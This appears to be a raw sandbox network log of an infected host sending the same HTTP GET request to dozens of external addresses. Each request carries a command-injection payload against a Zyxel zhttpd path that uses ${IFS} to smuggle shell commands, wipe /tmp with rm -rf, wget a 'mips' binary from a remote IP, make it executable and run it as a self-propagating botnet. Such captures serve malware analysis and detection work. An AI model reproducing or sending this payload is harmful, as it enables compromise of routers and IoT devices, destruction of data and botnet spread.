                                        Mar 31, 2024 09:20:36.292812109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1229192.168.2.2356060151.140.135.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292851925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1230192.168.2.2359778188.233.224.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292906046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1231192.168.2.235345250.139.60.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292934895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1232192.168.2.235003814.155.122.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292989969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1233192.168.2.2356934207.196.100.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293020964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1234192.168.2.235056290.161.239.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293060064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1235192.168.2.2341292120.248.106.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293113947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1236192.168.2.2345932166.99.129.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293148994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1237192.168.2.2359886170.198.71.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293190956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1238192.168.2.2344956195.60.252.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293231010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1239192.168.2.2357906219.0.6.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293277979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1240192.168.2.234601654.130.247.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293304920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1241192.168.2.2350804206.38.11.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293339968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1242192.168.2.2346374156.204.63.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293390989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1243192.168.2.2337792151.115.253.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293426991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1244192.168.2.2337276143.202.149.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293473005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1245192.168.2.2348812208.207.210.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293502092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1246192.168.2.2342326117.143.144.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293548107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1247192.168.2.2338656111.74.36.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293584108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1248192.168.2.235940076.229.89.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293623924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1249192.168.2.234553463.205.253.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293656111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1250192.168.2.2355858158.15.85.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293699026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1251192.168.2.2339506115.138.97.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293741941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1252192.168.2.2350456139.63.239.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293776035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1253192.168.2.2358526155.79.134.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293816090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1254192.168.2.236047443.184.133.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293858051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1255192.168.2.2357678182.244.126.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293891907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1256192.168.2.2343280207.158.129.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293947935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1257192.168.2.2357244149.221.145.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.293992043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1258192.168.2.235710442.12.214.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294043064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1259192.168.2.2352412151.4.235.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294086933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1260192.168.2.2360292220.220.21.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294131041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1261192.168.2.234676412.76.65.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294162035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1262192.168.2.2357542159.191.138.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294214964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1263192.168.2.2348128196.28.6.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294271946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1264192.168.2.234700078.210.236.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294289112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1265192.168.2.23412582.214.78.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294331074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1266192.168.2.2357634190.208.42.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294382095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1267192.168.2.2333274101.111.34.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294424057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1268192.168.2.2350332177.235.230.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294461966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1269192.168.2.2341950204.193.145.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294507980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1270192.168.2.235824461.177.6.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294548035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1271192.168.2.234820081.55.214.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294595957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1272192.168.2.2335812110.245.81.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294632912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1273192.168.2.2337092144.129.199.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294677019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1274192.168.2.2334494218.249.110.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294723034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1275192.168.2.235689891.236.97.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294766903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1276192.168.2.2332862185.43.152.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294810057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1277192.168.2.2345116178.60.89.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294847012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1278192.168.2.235563082.26.16.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294879913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1279192.168.2.235342083.83.86.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294924021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1280192.168.2.2348314138.242.99.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294956923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1281192.168.2.233338214.230.247.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.294994116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1282192.168.2.234642817.181.147.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295037031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1283192.168.2.234423247.190.147.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295095921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1284192.168.2.2335360207.151.230.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295113087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1285192.168.2.2342962102.64.182.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295162916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1286192.168.2.233660880.88.138.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295193911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1287192.168.2.233783485.101.170.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295252085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1288192.168.2.2353958183.98.82.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295269966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1289192.168.2.234739478.111.177.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295320988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1290192.168.2.2337288154.56.87.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295356989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1291192.168.2.23500484.38.59.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295387030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1292192.168.2.2348754144.160.86.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295448065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1293192.168.2.234828075.24.100.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295486927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1294192.168.2.2356554175.122.76.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295533895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1295192.168.2.2342006201.3.32.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295574903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1296192.168.2.2335894173.95.241.221443
                                        TimestampBytes transferredDirectionData
